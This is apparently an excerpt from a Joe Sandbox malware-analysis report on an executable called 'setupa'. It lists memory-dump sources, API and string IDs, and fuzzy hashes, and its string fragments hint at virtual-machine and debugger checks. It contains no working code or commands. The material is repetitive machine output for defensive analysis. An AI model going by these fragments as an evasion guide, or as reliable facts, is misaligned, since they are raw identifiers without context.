                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7ec2fe9ab7c55efb75ea5d8eec9c4d2881549e1a1771d82f71c2eb84ed0bef62
                                                                                                              • Instruction ID: b738d5c56da2d5d58aad2db6bb544352d41cc75b905af8dcfe794d2592ea9a9c
                                                                                                              • Opcode Fuzzy Hash: 7ec2fe9ab7c55efb75ea5d8eec9c4d2881549e1a1771d82f71c2eb84ed0bef62
                                                                                                              • Instruction Fuzzy Hash: 6E412222B1868982FB258F6594187696791FF46FE5F448239CE5E877C5CE3CE442C300
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 163848160391a1ef943f7f962c6539211572983eeca0e5cced50d2940cb25c5f
                                                                                                              • Instruction ID: d5f8576f2b6b79e256ac933d0513afa93494ab506f4402563a8196f5e80d3b03
                                                                                                              • Opcode Fuzzy Hash: 163848160391a1ef943f7f962c6539211572983eeca0e5cced50d2940cb25c5f
                                                                                                              • Instruction Fuzzy Hash: E941F062B1868986FB2A8F6598297696681FF06FD1F488239DE1E877C5CE3CD442C700
Memory Dump Source
• Source File: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
• Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1e073e0ed49816783ae2e4d1ec1d513d27fbaca5826269479ebc554b8283533f
• Instruction ID: 9bb0b06fa9f4aafaaf3b7a16b55dda2ef4f110d93f40170121de24370edeeebc
• Opcode Fuzzy Hash: 1e073e0ed49816783ae2e4d1ec1d513d27fbaca5826269479ebc554b8283533f
• Instruction Fuzzy Hash: 55D05EABC0EAC249F35109281D252A90BD16F03EE6A09837CCE74AB1C2DE0B5805C304
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
• Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID: AddressLibraryProc$Free$Load
• String ID: Inc$.dll$A$GmbH$Key$RegC$RegO$VMwa$Virt$adva$atio$eyEx$inno$lose$penK$pi32$tek $ual
• API String ID: 3262421712-3616160081
• Opcode ID: 32aab9f8747e90e5cd36af05437d79586b003251b280e5d9f502dfd3abc97177
• Instruction ID: b3f6e0ea1ac0aaf21aa24a589310eda3018710e8f3082e7ad84a481d25519e7d
• Opcode Fuzzy Hash: 32aab9f8747e90e5cd36af05437d79586b003251b280e5d9f502dfd3abc97177
• Instruction Fuzzy Hash: 58719273A18782C9FB218F65E4416E97760FF507A8F401339EAAD56AD9EF78D184CB00
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID: ErrorLast$CloseHandle$CreateCurrentEventProcess
• String ID: T
• API String ID: 258938509-3399717939
• Opcode ID: 8bde16c420e6d05d19059503116e67d64069cc38bcb120f809834552dcbc2ddc
• Instruction ID: 64b1e9c080d0d4b9b2c8c6546e42d7839363e185a898b1a02124317a77553c0c
• Opcode Fuzzy Hash: 8bde16c420e6d05d19059503116e67d64069cc38bcb120f809834552dcbc2ddc
• Instruction Fuzzy Hash: BE91BD32A08B42C6F710DF65E8542AA33E4FF84B96F50413ADA8D83A64EF3DD596C740
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID: ErrorLast$InformationLogicalProcessor$AddressHandleModuleProc
• String ID: GetLogicalProcessorInformationEx$kernel32.dll
• API String ID: 3420212499-4102870150
• Opcode ID: c9eb0fe9f961962842bf6dad6bc3eb56c3c015270d1434286e252ce2ac41614a
• Instruction ID: 0418173e2a12976150e05db666d7c60f0331afa72fad6de0b46a0e0788836fbb
• Opcode Fuzzy Hash: c9eb0fe9f961962842bf6dad6bc3eb56c3c015270d1434286e252ce2ac41614a
• Instruction Fuzzy Hash: 4831B121A08646C1FA14AF61F8550BA63E1BF84FC2F544439D94ED7799DE3CE885C700
APIs
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID: DebuggerPresent$CloseCreateDebugHandleObjectOutputSingleStringThreadWait
• String ID:
• API String ID: 3708507090-0
• Opcode ID: 6448836cf7e152e16fe49adc507436cdc7d479f4ad33e8b7a7aeda8892aed7e3
• Instruction ID: 229ac37988527e1bbf5b8f8a053e3fbf1d3be0248c829cb0040f5a56714bd6cd
• Opcode Fuzzy Hash: 6448836cf7e152e16fe49adc507436cdc7d479f4ad33e8b7a7aeda8892aed7e3
• Instruction Fuzzy Hash: 1C318331E1CA42C2F6209F65E81017962A0BF89FE2F25023DEA5ED3BD6DE7CE441C640
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID: Create$ErrorFileLastObject
• String ID: CreateFile failed$WARNING: The job `%S` already exists
• API String ID: 979301819-1099104511
• Opcode ID: 42060ffb55797cbde83a463c12f12cb6f478dad164c0c92bb815215232cc9f6c
• Instruction ID: baed039b32158ba4e2068d36f516edf4370323ee4b2aa6ad8b2871a09d3330e6
• Opcode Fuzzy Hash: 42060ffb55797cbde83a463c12f12cb6f478dad164c0c92bb815215232cc9f6c
• Instruction Fuzzy Hash: 0C416D32A08642C6FA209F26E8152A9B760FF98FD1F544239EE5D87796DF3CD581CB40
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID: FileHeader
• String ID: MOC$RCC$csm$csm
• API String ID: 104395404-1441736206
• Opcode ID: 3a833de7ca52a82ac35dbfba21539507ee4d6f25d5c0b7df1ccdb0255490a833
• Instruction ID: b3aee3f327cfaf6d53a1433c3836ddcf381fa36a6760eb32e7785acd20572ea9
• Opcode Fuzzy Hash: 3a833de7ca52a82ac35dbfba21539507ee4d6f25d5c0b7df1ccdb0255490a833
• Instruction Fuzzy Hash: 4F516872908642C6FB609F51D84136D67A2FF44F96F245039EA8D83799CF3CE881EB41
APIs
Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$FileWrite
                                                                                                              • String ID: Writ$eFil
                                                                                                              • API String ID: 603252729-742877703
                                                                                                              • Opcode ID: 43eaf5e623fd56909e1d6068382cbeacd74c7ffa1bd459052dcf470b9496c436
                                                                                                              • Instruction ID: 3840abf6775cdef3e8805706793bf277d251df23e17c7f731a33affbf124253d
                                                                                                              • Opcode Fuzzy Hash: 43eaf5e623fd56909e1d6068382cbeacd74c7ffa1bd459052dcf470b9496c436
                                                                                                              • Instruction Fuzzy Hash: 29118C32B48A02C9FB20DF75E8543EE23A0BF44B99F440239DA1D966D8EF38D549C304
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e0de1f533f0d522e1ee52b876cd52b26c956cbb957bf5cffaec9be16d4f4f5c9
                                                                                                              • Instruction ID: 16614a7b3b4563baf3cfde70ed4fe5a2f1418ef08c2dbb6050ddfb51bf54a289
                                                                                                              • Opcode Fuzzy Hash: e0de1f533f0d522e1ee52b876cd52b26c956cbb957bf5cffaec9be16d4f4f5c9
                                                                                                              • Instruction Fuzzy Hash: 45A18B63A08782C6FA618E7098503BA6691BF44FE6F9C4639DE6D867C5DF3CE444E340
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1849fb8246224c0562d57be9887867045d85da44354dc6fc0f83406d8c61ac05
                                                                                                              • Instruction ID: 47d4a28845b230aab6d709e8ae14de88dc9dbbb6dc09cf17c6a1cf1db50a08c2
                                                                                                              • Opcode Fuzzy Hash: 1849fb8246224c0562d57be9887867045d85da44354dc6fc0f83406d8c61ac05
                                                                                                              • Instruction Fuzzy Hash: 0F91D422F08642C6FA649F219461279A6A5FF42FE6F154239DE6E8B6D4DF3CD842D300
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                              • String ID:
                                                                                                              • API String ID: 3659116390-0
                                                                                                              • Opcode ID: f3b47c5b912e3f4e71813dd3e7deaa716c48953dbbc8e8a0e7e9734a54d15a5d
                                                                                                              • Instruction ID: 00785c211ac09c723b2213339fbe26841cad962d26c42e65b0779d11568c7df9
                                                                                                              • Opcode Fuzzy Hash: f3b47c5b912e3f4e71813dd3e7deaa716c48953dbbc8e8a0e7e9734a54d15a5d
                                                                                                              • Instruction Fuzzy Hash: 29516E32A14A92CAF710CF75E4443AD2BA0FB44B99F448139DE4E97A99EF38D146D700
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc
                                                                                                              • String ID:
                                                                                                              • API String ID: 190572456-0
                                                                                                              • Opcode ID: 3e05fff8e21687def1374a662557877356c58e1e453b3372514b144f9b3abeea
                                                                                                              • Instruction ID: 7986c396e1e451936fe7df4c9c34e9c2d66464204f31cf8d5fdf67cd1c77ab6a
                                                                                                              • Opcode Fuzzy Hash: 3e05fff8e21687def1374a662557877356c58e1e453b3372514b144f9b3abeea
                                                                                                              • Instruction Fuzzy Hash: 9B41B021B29602C1FA159F86A88567A62A1BF48FD2F09453DDD2FCB784EE3CE441C304
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: List$Interlocked$DepthEntryPushQuery$Flush
                                                                                                              • String ID:
                                                                                                              • API String ID: 358188281-0
                                                                                                              • Opcode ID: 66ac247cbe1d0099658d73aed0862cb96b3719d871f8e55e01e92a7e858667aa
                                                                                                              • Instruction ID: 8584711e50c4fbc7f088741cc3497ece6d17f06aa84d1c68b3057e402b3b01c5
                                                                                                              • Opcode Fuzzy Hash: 66ac247cbe1d0099658d73aed0862cb96b3719d871f8e55e01e92a7e858667aa
                                                                                                              • Instruction Fuzzy Hash: 72416C32A18A51C6EB14DF25E5501BD37B0FF49F8AB510139EA4E83B58EF38E994E740
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: List$Interlocked$DepthEntryPushQuery$Flush
                                                                                                              • String ID:
                                                                                                              • API String ID: 358188281-0
                                                                                                              • Opcode ID: a6dca042b08bc734442d46a4a34d4c280bf8817fa64ad2d32edf740ba09ec30d
                                                                                                              • Instruction ID: 802ffdf7867220f9a94a1917758f77bd7caf7fed9a2fb5bacf11c42cc401209c
                                                                                                              • Opcode Fuzzy Hash: a6dca042b08bc734442d46a4a34d4c280bf8817fa64ad2d32edf740ba09ec30d
                                                                                                              • Instruction Fuzzy Hash: A9415D72608A41C6EF15DF26E5501BD37A0FF89F8AB14013AEE4E93A54DF38EA85D740
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmp
